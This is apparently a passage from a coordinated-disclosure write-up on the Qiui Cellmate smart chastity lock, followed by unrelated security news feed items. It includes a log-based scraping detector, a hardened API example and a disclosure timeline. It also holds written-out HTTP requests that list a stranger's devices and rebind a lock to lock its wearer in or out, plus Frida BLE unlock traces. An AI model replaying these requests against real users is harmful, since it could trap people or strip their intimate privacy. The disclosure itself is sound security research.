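    code = FRIEND_CODE_RE.search(m["path"])
    return {
        "ip": m["ip"],
        "ts": datetime.fromisoformat(m["ts"]),
        "friend_code": code.group(1) if code else None,
        "status": int(m["status"]),
    }


def find_enumerators(lines, window=timedelta(minutes=5), threshold=20):
    """Map client IP -> peak number of distinct friend codes successfully
    fetched inside any `window`, for clients exceeding `threshold`."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["friend_code"] and rec["status"] == 200:
            per_ip[rec["ip"]].append((rec["ts"], rec["friend_code"]))

    flagged = {}
    for ip, events in per_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # slide the window start forward until the span fits inside `window`
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = len({code for _, code in events[start:end + 1]})
            if distinct > threshold:
                flagged[ip] = max(flagged.get(ip, 0), distinct)
    return flagged


def _constructed_log():
    """Constructed sample: one ordinary user and one bulk-scraping client."""
    base = datetime(2020, 6, 1, 12, 0, 0)
    lines = []
    for i in range(3):  # a real user re-opens one friend's profile a few times
        ts = base + timedelta(minutes=i)
        lines.append(f"203.0.113.5 [{ts.isoformat()}] GET /friend?friendCode=483920 200")
    for i in range(30):  # one client pulls 30 different codes in two minutes
        ts = base + timedelta(seconds=4 * i)
        lines.append(f"198.51.100.7 [{ts.isoformat()}] GET /friend?friendCode={100000 + i:06d} 200")
    return lines


SAMPLE_LOG = _constructed_log()

if __name__ == "__main__":
    for ip, n in find_enumerators(SAMPLE_LOG).items():
        print(f"{ip}: {n} distinct friend codes inside a 5 minute window")
```

The threshold is deliberately a count of distinct codes rather than raw request volume, since a legitimate user polling one friend's record repeatedly should not trip it; tune the window and threshold to the real application's usage.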
Numbers and leaked location data
We were able to sample a few IDs at random, showing user locations at the time of app registrations. Bear in mind this is just a small subset of users from the available data. We threw away any personal information immediately.
memberCode data = DoS for the user
Now that we have the longer memberCode, we can fetch all the devices associated with that person:
GET /list?memberCode=20200409xxxxxxxx HTTP/1.1
Host: qiuitoy.com
Connection: close

"deviceId": 0,
"deviceCode": "201909xxxxxxxxxx",
"deviceName": "Cellmatexxxx",
"deviceNick": "Cellmatexxxx",
"deviceNumber": "QIUIxxxxxxxxx",
"deviceType": 2,
"deviceBlue": null,
"deviceBlueAddr": "F9:34:02:XX:XX:XX",
"isEncrypt": 1,
And once we have that, we can work out what permissions that person has over that lock (so can they unlock it themselves or have to ask someone else):
GET /wear?memberCode=20200409xxxxxxx&deviceCode=20191204xxxxxx HTTP/1.1
Host: qiuitoy.com
And if they can, we can flip that so they’re now locked out of the device:
POST /binding HTTP/1.1
Host: qiuitoy.com
Connection: close

memberName=Pwned&memberCode=20200409xxxxxx&deviceCode=20191204xxxxxx
And we can do that to everyone, very quickly, locking everyone in, or out. There is no emergency override function either, so if you’re locked in there’s no way out. This may or may not be considered a feature!
The BLE implementation itself requires an API request to generate an unlock command based on a token previously written to the lock. It’s possible we could analyse the requests and responses to generate the right key, or reverse engineer the lock hardware itself…
The above is taken from the decompiled Android app and by hooking it with Frida we can see the notifies (36f6) and writes (36f5) associated with checking the battery level first and then the unlock (the third write):
[+] BluetoothGattCallback constructor called from com.apicloud.uzble.AndroidBle$2
[BLE Write =>] UUID: 000036f5-0000-1000-8000-00805f9b34fb data: 0x56f3430769ddd6e1603xxx
[BLE Notify <=] UUID: 000036f6-0000-1000-8000-00805f9b34fb data: 0xe01012b3074d111c98bxxx
[BLE Write =>] UUID: 000036f5-0000-1000-8000-00805f9b34fb data: 0x25f8a92325fd9cfc7ea79xxx
[BLE Notify <=] UUID: 000036f6-0000-1000-8000-00805f9b34fb data: 0x2717dd996ab4a017a6ceexxx
[BLE Write =>] UUID: 000036f5-0000-1000-8000-00805f9b34fb data: 0x9ee90373a2d3f156b3557xxx
[BLE Notify <=] UUID: 000036f6-0000-1000-8000-00805f9b34fb data: 0xbcdaea06fa1cb94f3f1c2596xxx
[BLE Write =>] UUID: 000036f5-0000-1000-8000-00805f9b34fb data: 0x9ee90373a2d3f156b3557d52xxxx
[BLE Notify <=] UUID: 000036f6-0000-1000-8000-00805f9b34fb data: 0xc04dab04c54c818d808a78c79adef839
But wait, that hex from the Android app, and the BLE characteristics look awfully familiar. It’s exactly the same implementation as the Nokelock we looked at, except the advertised device name is “OKGSS101”.
The per lock AES encryption key is returned in the API call listing the devices we made earlier. Mass unlocking over BLE anyone?
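The API problems above (unauthenticated endpoints keyed on guessable codes, full records including the password and coordinates in responses, anyone able to rebind a lock, and the per-lock AES key handed out in the device listing) all come down to three missing controls: authenticate the caller, authorise per object, and minimise what goes back. The following is an added example, not Qiui's code, that puts the vulnerable shape next to a hardened one. The data model, function names, session handling and the `owner`/`keyholder` fields are assumptions for illustration; only the field names that appear in the post's responses are taken from it, and all records are constructed.

```python
"""Added example, not Qiui's code: the API pattern the post describes, with
the vulnerable shape beside a hardened one.

The post says the endpoints accepted any memberCode/deviceCode pair without
authentication, returned the plaintext password, exact coordinates and the
per-lock AES key, and let anyone rebind a lock. The data model, function
names and session handling below are assumptions for illustration."""

import hmac
import secrets

# Constructed store. The date-prefixed codes mirror the deterministic
# identifiers the post describes. Passwords are plaintext here only to show
# what the vulnerable handler leaks; a real service stores a password hash.
USERS = {
    "20200409000001": {"memberCode": "20200409000001", "name": "Wearer",
                       "phone": "+44 7700 900001", "password": "hunter2",
                       "lastLocation": (51.5074, -0.1278),
                       "devices": ["20191204000001"]},
    "20200409000002": {"memberCode": "20200409000002", "name": "Stranger",
                       "phone": "+44 7700 900002", "password": "letmein",
                       "lastLocation": (53.4808, -2.2426), "devices": []},
}
DEVICES = {
    "20191204000001": {"deviceCode": "20191204000001", "deviceName": "Cellmate0001",
                       "deviceBlueAddr": "F9:34:02:00:00:01",
                       "aesKey": "00" * 16,             # must never leave the server
                       "keyholder": "20200409000001"},  # who may (un)lock via the app
}


# --- vulnerable shape: identity is whatever memberCode the caller supplies ---
def list_devices_vulnerable(member_code):
    user = USERS.get(member_code)
    if user is None:
        return 404, {}
    # Whole records, password and BLE key included, to an unauthenticated caller.
    return 200, {"user": user, "devices": [DEVICES[d] for d in user["devices"]]}


def binding_vulnerable(member_code, device_code):
    # No check at all: two guessable codes are enough to take over a lock,
    # which is the lock-in / lock-out issue the post describes.
    DEVICES[device_code]["keyholder"] = member_code
    return 200, {"keyholder": member_code}


# --- hardened shape: authenticate, then authorise per object, then minimise ---
SESSIONS = {}  # opaque bearer token -> memberCode


def login(member_code, password):
    user = USERS.get(member_code)
    if user is None or not hmac.compare_digest(user["password"], password):
        return None
    token = secrets.token_urlsafe(32)  # 256 random bits, not date-derived
    SESSIONS[token] = member_code
    return token


USER_FIELDS = ("memberCode", "name")
DEVICE_FIELDS = ("deviceCode", "deviceName", "keyholder")


def list_devices_hardened(token):
    me = SESSIONS.get(token)
    if me is None:
        return 401, {}
    user = USERS[me]
    # Only the caller's own record, only the fields the app needs: no password,
    # no coordinates, no phone number and no per-lock key in the response.
    return 200, {"user": {k: user[k] for k in USER_FIELDS},
                 "devices": [{k: DEVICES[d][k] for k in DEVICE_FIELDS}
                             for d in user["devices"]]}


def binding_hardened(token, device_code, new_keyholder):
    me = SESSIONS.get(token)
    if me is None:
        return 401, {}
    device = DEVICES.get(device_code)
    if device is None or new_keyholder not in USERS:
        return 404, {}
    # Object-level authorisation: only the current keyholder may hand over
    # control, so knowing someone else's codes is no longer enough.
    if me != device["keyholder"]:
        return 403, {}
    device["keyholder"] = new_keyholder
    return 200, {"keyholder": new_keyholder}
```

The session token is generated with `secrets.token_urlsafe`, so it carries no structure an outsider can reconstruct from a signup date, unlike the memberCode. Note that the hardened listing never includes `aesKey` or `deviceBlueAddr`: if the lock's BLE unlock command must be derived server-side, the derivation belongs on the server, and the key itself should not be part of any client-facing payload.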
Locked in? Here’s a workaround
If you find yourself locked in, you’re probably wondering how you can get out without heavy tools or a visit to the emergency room…
The design of the locking pin uses a motor to withdraw it and is unfortunately not ferrous, so no easy use of magnets, nor is “bumping” it open (as you’ll be wearing it). I had a little success with a shim made from a cut-up can, but the idea of sharp pointy metal near anything important isn’t ideal.
The “better” alternative is to prise open the circuit board area where the front button and light are:
It’s glued-in but came out without much effort or damage. 3 volts (two AA batteries) applied to the white and yellow wires is enough to drive the unlock motor directly (white = negative, yellow = positive), a technique known as “spiking”.
Your local emergency department will probably have the right tools to cut through the metal safely though, and would be your better first port of call!
As a realistic threat, the personal data leakage seems more likely to be exploited, since it offers an attacker a direct reward.
A number of countries have oppressive laws that may expose users of these types of devices to unwarranted interest from law enforcement and bigots.
Further, users are likely to want to keep their private lives private. They should expect privacy by default and security by design. If one wants to share very private information, then that should be by explicit intent of the user.
Many adult toy vendors have shown almost complete disregard for privacy and security over recent years. Fortunately, projects such as the Internet of Dongs have helped guide many towards improved security. Clearly Qiui hadn’t got the message.
Disclosure wasn’t as seamless as we might have initially hoped:
April 20th 2020: we messaged them asking who to report the issue to. They replied very quickly. Cool!
No problem, so we tried again without PGP:
So we sent them the details. Silence reigned.
May 26th 2020: we pushed a little harder, they responded, stating that they would fix by 6th June.
June 11th 2020: an updated version was deployed to the App & Play Stores. This mostly resolved issues, with requests now being forced to authenticate. Older API endpoints were left up though, and new APIs still returned exact user locations.
June 17th 2020: we sent a message detailing the residual problems, with no response.
June 25th 2020: we reached out again, via a journalist, Qiui said they didn’t want to fix (or couldn’t) as they “only” had $50,000.
June 30th 2020: we sent a follow up email (and twitter DM) with potential fixes to the remaining problems (and had it translated into Chinese just in case), with no response.
July 10th 2020: we contacted two UK retailers of the device to make them aware of the issues. One withdrew it from sale, and made contact with the EU-based wholesalers. Qiui responded back to the retailers that the remaining issues would be fixed “in August”.
September 11th 2020: RenderMan from @InternetOfDongs got in touch with us too: he had helped another researcher through the disclosure process with Qiui. @MikeTsenatek had found a password reset issue independently and was also struggling to get heard by the vendor. By chance he noticed a tweet of mine some time ago, figured that we might be looking at this device and reached out.
We had a great call together where we exchanged remarkably similar experiences of interactions with Qiui! His write-up is available here.
This reinforced our decision to publish: clearly others were likely to find these issues independent of us, so the public interest case was made in our minds.
RenderMan definitely deserves kudos for his continued efforts to broker conversations between researchers and vendors in the adult toy arena. Some vendors have made significant improvements to their product security and privacy as a result of his hard work.
October 4th 2020: We were contacted by a third researcher with similar concerns.
October 6th 2020: We published in coordination with the other parties.
infosec writers: InfoSecWriters.com (3 items)
Contributed by Kevin Thompson
Over the past five years, my organization has pursued becoming more organized in its information security program. To develop an effective program, the organization must start with the basics. Identify and categorize all company assets to effectively apply desired controls later in this process. Next, you must identify recurring maintenance windows and communicate with the asset owners to ensure maintenance awareness. Identify and configure security applications that will apply remediations. Identify and decommission all stale assets to eliminate unnecessary risk in the environment. Once all the previously mentioned steps are complete, the security management program is at the beginning stages of becoming an effective tool to lower risk in the environment.
Contributed by Adam Yarborough
Secrets management is an aspect of information security management needed for organizations of all sizes. Small organizations may leave all the important passwords in the control of the owner, whereas larger organizations may have multiple teams dedicated to different facets of information security. This paper will inspect the creation and adoption of specialized roles in information security management with a focus on secrets management. There are commonalities shared between the carefully guarded recipes of a family restaurant, the intellectual property holdings of startups looking for acquisition, and classified credentials protected by nation states. Associated with those commonalities are roles and their positions in the organization structure that were created to protect confidentiality, integrity, and availability. A person may be able to easily remember a single password, like for a website, but maintaining multiple unique passwords across many sites will soon lead to either password re-use or lost credentials. The same happens with organizations of all sizes.
Contributed by David Brehmer
Transformational technologies can change the information technology landscape at a high level. These technologies are known as disruptive. One of the fastest growing emerging technologies is the Internet of Things, or IoT. While IoT devices have existed for over 20 years, the last decade has seen a substantial shift in the impact of these devices on the world. From smart watches being able to detect atrial fibrillation to self-driving cars, IoT devices have changed human interaction with computing devices. This emerging technology has ushered in a change so dramatic that our lives will change in ways we have yet to comprehend. This study will investigate the history of IoT and explore the ways this disruptive technology will forever alter humanity.
security week: SecurityWeek RSS Feed (3 items)
A ransomware attack that hobbled a Georgia county government in early October reportedly disabled a database used to verify voter signatures in the authentication of absentee ballots.
Microsoft and MITRE, in collaboration with a dozen other organizations, have developed a framework designed to help identify, respond to, and remediate attacks targeting machine learning (ML) systems.
Risk is a condition that pre-exists an incident. If you reduce security risk, you will reduce security incidents. Epiphany is a new risk detection and quantification platform that highlights, qualifies and quantifies the risks that occur within the technical structure and users of a network, giving the security team the opportunity to eliminate the risk before an incident.
tech-wreck infosec blog: Tech-Wreck InfoSec Blog (3 items)
Adobe Releases Second Set of Security Updates for October (10/20/2020)
In a second round of security advisories for October, Adobe has issued bulletins for a number of products including Illustrator, Dreamweaver, Photoshop, InDesign, and its Creative Cloud Desktop Application. A total of twenty vulnerabilities have been addressed, including seven critical bugs that can lead to arbitrary code execution in the Windows and macOS versions of Illustrator. While many of the vulnerabilities have been rated critical, a majority have a priority rating of 3, which indicates that Adobe does not expect them to be exploited in malicious attacks.
Chrome Update Fixes Zero-Day in Freetype Font Library (10/20/2020)
Google's newest release of its Chrome browser includes five security updates, including a patch for a zero-day vulnerability in its Freetype font rendering library. Details of the bug have not been released, although the company says it is a heap buffer overflow issue and it is aware of reports that an exploit exists in the wild. Google often restricts access to bug details until a majority of users are updated with a fix or if the bug is known to exist in third party libraries but has not yet been remediated.
Cisco Issues 17 Security Appliance Patches (10/21/2020)
The October release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication includes advisories that describe 17 vulnerabilities in Cisco Adaptive Security Appliance (ASA), Firepower Threat Defense (FTD), and Firepower Management Center (FMC) software. Cisco has released software updates for these vulnerabilities. All of the vulnerabilities have a security impact rating (SIR) of high.
Company Networks, Mobile Devices at Risk Due to MDM Server Bugs (10/21/2020)
Recently disclosed vulnerabilities in MobileIron servers used to manage enterprise mobile devices are being exploited to attack company networks. Although the flaws were patched by MobileIron in July, a published report detailing one of the bugs led to the development of proof of concept exploits that are now being used in the wild. Since these mobile device management (MDM) servers must be online 24/7 in order to communicate updates with company devices, they are often targeted for attacks. In this case, the flaw allows an unauthenticated remote user to execute arbitrary code and install DDoS malware. As ZDNet points out, "Patching is only half of the job. Companies must also perform security audits of their MobileIron MDM servers, their mobile devices, and internal networks," continuing that "intruders can use this bug to take over the entire MDM server and then deploy malware on mobile devices connected to the MDM server or access the company's internal network, to which the MDM server is likely to be connected."
Malicious NPM Software Packages Identified (10/19/2020)
Waze GPS App Showed Usernames, Allowed Tracking of Individuals (10/19/2020)
A vulnerability has been discovered in the Waze GPS navigation app that can allow hackers to identify drivers by username and ID and track them. Because the app shows icons of other drivers in the vicinity, a researcher discovered that he could get the Waze API to display the coordinates for both his location and for nearby users. While inspecting the data, he noticed that ID numbers associated with the icons were not only included but didn't change over time. The unique IDs then allowed him to track individual users and follow them on the map. What's more, according to Autoevolution, the researcher said, "I found out that if user acknowledge any road obstacle or reported police patrol, user ID together with the username is returned by the Waze API to any Wazer driving through the place. The application usually don't show this data unless there is an explicit comment created by the user, but the API response contains the username, ID, location of an event and even a time when it was acknowledged." The researcher received a bounty for the discovery and the vulnerability has been patched.
xkcd: xkcd.com (3 items)